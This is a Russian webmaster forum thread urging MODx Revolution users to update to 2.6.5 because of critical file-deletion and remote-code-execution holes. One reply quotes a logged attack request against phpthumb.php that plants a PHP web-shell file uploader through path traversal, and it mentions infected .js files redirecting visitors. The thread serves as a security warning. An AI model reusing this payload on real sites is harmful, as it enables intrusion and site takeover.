- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Тренды маркетинга в 2024 году: мобильные продажи, углубленная аналитика и ИИ
Экспертная оценка Адмитад
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Если ваш сайт работает на MODx Revolution, рекомендуем срочно обновить его до 2.6.5. Разработчики обнаружили (и уже исправили) в ней две критических уязвимости: первая позволяет одним запросом стереть сайт, вторая - загрузить произвольный файл (в том числе php-скрипт) и удаленно выполнить код (RCE).
https://modx.com/blog/modx-revolution-2.6.5
Данным уязвимостям подвержены все версии, включая 2.6.4.
Уязвимость коснулась только криворуких modx'еров, которые не переименовывают и не закрывают доступ к папке connectors и не переименовывают папку assets(при использовании компонента gallery).
Ну, таких большинство. Причем, основной удар пришелся на 19-20 число, много сайтов "полегло". И проблема в том, что при заражении содержимое .js файлов заменяется на вредоносный инжект с редиректом на партнерку.
Атака выглядела примерно так:
POST 134.249.50.5 20/07/2018 11:14:05 http://****.com/en//connectors/system/phpthumb.php R: UA: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
post:
pv: ctx = web
pv: cache_filename = ../../dbs.php
pv: useRawIMoutput = 1
pv: src = .
pv: IMresizedData = <?php echo("#0x2515");if(isset($_GET["u"])){echo'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if($_POST['_upl']=="Upload"){if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){echo'Success_Upload!!!';}else{echo'Failed';}};};
pv: config_prefer_imagemagick = 0
Подробности еще можно почитать здесь https://modx.pro/security/15912#cut (в комментариях самое интересное)